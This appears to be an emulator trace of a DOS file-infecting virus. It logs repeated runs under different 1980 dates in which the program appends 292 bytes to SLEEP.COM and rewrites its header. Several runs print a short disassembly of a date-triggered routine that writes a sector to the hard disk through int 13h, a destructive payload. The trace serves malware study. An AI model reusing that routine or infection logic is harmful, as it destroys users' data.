2018-12-25T12:41:57.233647694Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.242652268Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.246684702Z 59 PC: 12af4 | Change current directory
2018-12-25T12:41:57.251982614Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-25T12:41:57.589477642Z 26 PC: 12b21 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14877,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.798488322Z 26 PC: 12a5d | Set disk transfer address
2018-12-25T12:41:56.800124685Z 78 PC: 12a6b | Find first file
2018-12-25T12:41:56.808749499Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.816512456Z 87 PC: 12a88 | Get or set file date and time
2018-12-25T12:41:56.818587593Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.82735453Z 66 PC: 12aab | Move file pointer
2018-12-25T12:41:56.829923916Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-25T12:41:56.845913879Z 66 PC: 12ac6 | Move file pointer
2018-12-25T12:41:56.848680662Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.855154717Z 87 PC: 12adf | Get or set file date and time
2018-12-25T12:41:56.857430939Z 62 PC: 12ae3 | Close file
2018-12-25T12:41:56.866618932Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.870065449Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.877933587Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.879414209Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.885412666Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.886612785Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.889168791Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.891498921Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.894090818Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.895340255Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.902605004Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.905221211Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.911794755Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.914105345Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.922197628Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.924001123Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.927644451Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.930829279Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.93297487Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.934453108Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.941827337Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.944567555Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.952217155Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.954952839Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.962036047Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.96514732Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.969672961Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.971620163Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.974981659Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.978038211Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.98710125Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.990545658Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.001038794Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.002743152Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.010159994Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.012050581Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.016349931Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.017916362Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.020909741Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.024230152Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.032613802Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.035921952Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.056330206Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.058581648Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.068908951Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.074403141Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.083811321Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.085480402Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.093374325Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.096178947Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.10562585Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.108992506Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.11788749Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.119882568Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.127487971Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.130408525Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.135120089Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.137133473Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.141335831Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.143813443Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.152707246Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.156490969Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.165486074Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.167494065Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.170799903Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.173996081Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.183548435Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.185338497Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.193589608Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.195868507Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.213434519Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.217397032Z 59 PC: 12af4 | Change current directory
2018-12-25T12:41:57.222359545Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-25T12:41:57.225136935Z 26 PC: 12b21 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14877,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.888548165Z 26 PC: 12a5d | Set disk transfer address
2018-12-25T12:41:56.890921602Z 78 PC: 12a6b | Find first file
2018-12-25T12:41:56.898758722Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.905884716Z 87 PC: 12a88 | Get or set file date and time
2018-12-25T12:41:56.90795057Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.914948912Z 66 PC: 12aab | Move file pointer
2018-12-25T12:41:56.916734042Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-25T12:41:56.933397876Z 66 PC: 12ac6 | Move file pointer
2018-12-25T12:41:56.935995191Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.941765642Z 87 PC: 12adf | Get or set file date and time
2018-12-25T12:41:56.943905983Z 62 PC: 12ae3 | Close file
2018-12-25T12:41:56.953583478Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:56.957124545Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:56.963567954Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:56.966014673Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:56.971814447Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:56.973135432Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:56.976854992Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:56.987430869Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:56.989666017Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:56.991951697Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:56.997661204Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.000710485Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.006654463Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.009838035Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.017314944Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.019086677Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.023020356Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.0250635Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.029730027Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.036364336Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.052773208Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.057060096Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.070383579Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.072284917Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.080296275Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.083037496Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.086371818Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.088062193Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.091883526Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.094066833Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.103126383Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.106569049Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.114952511Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.117249674Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.126143527Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.129884602Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.13404085Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.136311343Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.141348015Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.143633643Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.152895107Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.157575375Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.166447974Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.168688384Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.178003049Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.181116192Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.190924876Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.193095181Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.202638226Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.204780287Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.21391114Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.218462796Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.226185795Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.228204042Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.236692479Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.239088691Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.242557384Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.245348312Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.249127284Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.250890709Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.259131273Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.263437263Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.271897604Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.273907091Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.278356622Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.280379994Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.588628065Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.591296676Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.599005188Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.601135631Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.611021182Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.614522269Z 59 PC: 12af4 | Change current directory
2018-12-25T12:41:57.619554538Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-25T12:41:57.622396103Z 26 PC: 12b21 | Set disk transfer address

{"DateBased":true,"Day":2,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14877,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.970166957Z 26 PC: 12a5d | Set disk transfer address
2018-12-25T12:41:56.971678369Z 78 PC: 12a6b | Find first file
2018-12-25T12:41:56.977608801Z 61 PC: 12a81 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.983842861Z 87 PC: 12a88 | Get or set file date and time
2018-12-25T12:41:56.987012458Z 63 PC: 12a9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.99360418Z 66 PC: 12aab | Move file pointer
2018-12-25T12:41:56.994921188Z 64 PC: 12abd | Write file or device (Write 292 bytes on handle 5)
2018-12-25T12:41:57.011334741Z 66 PC: 12ac6 | Move file pointer
2018-12-25T12:41:57.012669206Z 64 PC: 12ad1 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:57.019333259Z 87 PC: 12adf | Get or set file date and time
2018-12-25T12:41:57.020808708Z 62 PC: 12ae3 | Close file
2018-12-25T12:41:57.028465888Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.030848607Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.037180908Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.038505282Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.044487721Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.045701937Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.048539205Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.049776628Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.052133372Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.054411043Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.06163766Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.064050906Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.070984725Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.073267865Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.079356547Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.081363455Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.084578912Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.086328297Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.089904067Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.091490719Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.09879027Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.101789979Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.108351317Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.109676536Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.116675897Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.118165946Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.120284565Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.122153303Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.124568982Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.126508846Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.13472803Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.13728599Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.144216583Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.146132585Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.152443572Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.153857824Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.157525582Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.159233206Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.162156545Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.164932262Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.171956215Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.174488612Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.180955333Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.182563133Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.188721318Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.190156623Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.198539297Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.19982917Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.20615955Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.208305718Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.216429696Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.21901295Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.226214246Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.227544956Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.233674489Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.235715449Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.238320937Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.239658267Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.243039012Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.244389225Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.251404677Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.254242537Z 61 PC: 12a81 | Open file (See above)
2018-12-25T12:41:57.260572039Z 87 PC: 12a88 | Get or set file date and time (See above)
2018-12-25T12:41:57.261768849Z 63 PC: 12a9b | Read file or device (See above)
2018-12-25T12:41:57.264560309Z 66 PC: 12aab | Move file pointer (See above)
2018-12-25T12:41:57.265812803Z 64 PC: 12abd | Write file or device (See above)
2018-12-25T12:41:57.273703444Z 66 PC: 12ac6 | Move file pointer (See above)
2018-12-25T12:41:57.275569987Z 64 PC: 12ad1 | Write file or device (See above)
2018-12-25T12:41:57.282398769Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T12:41:57.28432498Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T12:41:57.293352451Z 79 PC: 12a6b | Find next file (See above)
2018-12-25T12:41:57.295712382Z 59 PC: 12af4 | Change current directory
2018-12-25T12:41:57.299909017Z 42 PC: 12b01 | Get date 0x12b01: cmp dh, 4
0x12b04: jne 0x12b1a
0x12b06: cmp dl, 2
0x12b09: jne 0x12b1a
0x12b0b: mov ax, 0x301
0x12b0e: mov cx, 1
0x12b11: mov dx, 0x80
0x12b14: lea bx, word ptr [bp + 0x100]
0x12b18: int 0x13
0x12b1a: mov dx, 0x80
0x12b1d: mov ah, 0x1a
0x12b1f: int 0x21
0x12b21: mov di, 0x100
0x12b24: push di
0x12b25: ret
0x12b26: sub bp, word ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [0x2e], ch
0x12b2f: jmp 0x12c57
0x12b32: push si
2018-12-25T12:41:57.633504802Z 26 PC: 12b21 | Set disk transfer address